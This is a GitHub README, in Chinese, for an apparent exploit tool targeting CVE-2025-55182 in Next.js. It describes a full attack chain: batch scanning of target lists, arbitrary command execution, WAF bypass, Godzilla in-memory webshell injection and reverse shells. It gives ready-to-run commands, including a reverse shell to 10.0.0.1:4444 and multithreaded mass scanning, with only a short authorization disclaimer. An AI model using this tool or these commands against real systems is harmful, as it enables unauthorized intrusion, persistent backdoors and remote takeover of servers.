luoqichen/CVE-2025-55182-POC

GitHub: luoqichen/CVE-2025-55182-POC

针对CVE-2025-55182 Next.js远程代码执行漏洞的检测与利用工具,支持从批量探测到命令执行、内存马注入的完整攻击链。

Stars: 0 | Forks: 0

# CVE-2025-55182 Next.js RCE Scanner [![License](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE) CVE-2025-55182 漏洞扫描与利用工具,针对 Next.js 应用程序的远程代码执行漏洞。支持批量检测、命令执行、哥斯拉内存马注入以及反弹 Shell 功能。 ## 特性 - **多目标扫描**:支持单个 URL、文件列表(每行一个 URL)以及包含多个 `.txt` 文件的文件夹。 - **多线程并发**:可自定义线程数,提升扫描效率。 - **漏洞验证**:通过计算随机数乘积的方式验证漏洞是否存在。 - **命令执行**:在漏洞目标上执行任意系统命令(支持 Linux 和 Windows)。 - **哥斯拉内存马注入**:一键生成哥斯拉内存马连接信息。 - **反弹 Shell**:支持反弹 Shell 功能。 - **结果保存**:自动保存成功利用的 URL 和详细信息到 `success.json`,并可选输出漏洞 URL 到指定文件。 - **代理支持**:可配置 HTTP 代理,便于联动 Burp Suite 等工具。 - **进度显示**:实时显示扫描进度、已用时间、预计剩余时间等。 [![](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/f2f731f8a4192334.png)] ## 安装 ### 前置要求 - Go 1.16 或更高版本 - Git ### 克隆仓库 git clone https://github.com/luoqichen/CVE-2025-55182-POC.git cd cve-2025-55182-POC ### 编译 go build -o cve-2025-55182 main.go ### 运行 ./cve-2025-55182 -h ## 使用方法 ### 参数说明 | 参数 | 类型 | 默认值 | 描述 | |------|------|--------|------| | `-u` | string | 无 | 单个目标 URL(例如 `http://example.com:3000`) | | `-f` | string | 无 | 包含 URL 列表的文件(每行一个) | | `-d` | string | 无 | 包含多个 `.txt` 文件的文件夹 | | `-o` | string | 无 | 输出文件(保存漏洞 URL,每行一个) | | `-t` | int | 10 | 并发线程数 | | `-to` | int | 10 | 请求超时时间(秒) | | `-c` | string | 无 | 要执行的命令(例如 `id`) | | `-m` | string | 无 | 模式:`waf`(启用 WAF 绕过) | | `-p` | string | 无 | HTTP 代理(例如 `http://127.0.0.1:8080`) | | `-g` | bool | false | 启用哥斯拉内存马注入 | | `-rs` | string | 无 | 反弹 Shell 地址(格式 `IP:PORT`) | | `-dv` | bool | false | 详细模式(打印每个 URL 的扫描过程) | | `-es` | bool | false | 敏感信息扫描模式 | ### 示例 #### 扫描单个目标 ./cve-2025-55182 -u http://target.com:3000 #### 批量扫描文件中的目标 ./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt #### 执行命令 ./cve-2025-55182 -u http://target.com:3000 -c "whoami" #### 使用哥斯拉内存马 ./cve-2025-55182 -u http://target.com:3000 -g 成功注入后,工具会输出哥斯拉的连接地址、密码、密钥和请求头信息。 #### 反弹 Shell ./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444 #### 启用代理 ./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10 ## 输出说明 - **`success.json`**:自动保存所有成功利用的目标详细信息(包括命令输出、哥斯拉配置等)。 - **`-o` 指定的文件**:保存漏洞 URL 列表(每行一个)。 扫描过程中会实时显示进度条和已发现的漏洞,最终输出统计信息。 ## 注意事项 1. **确保已获得授权**:未经授权扫描或攻击他人系统属于违法行为。 2. **代理使用**:如果需要通过 Burp Suite 查看流量,请使用 `-p` 参数设置代理。 3. **哥斯拉连接**:成功注入哥斯拉后,请使用哥斯拉客户端连接,注意密码和密钥均为随机生成。 4. **超时设置**:对于网络较差的目标,可适当增加 `-to` 参数值。 ## 免责声明 本工具仅用于安全研究和授权测试,使用者需自行承担一切法律责任。开发者不对任何滥用行为负责。 ## License [MIT](LICENSE)
标签:CISA项目, CVE-2025-55182, EVTX分析, Go, POC, RCE, Ruby工具, URL发现, Web安全, 内存马注入, 加密, 反弹Shell, 命令执行, 哥斯拉, 安全检测, 日志审计, 漏洞扫描器, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护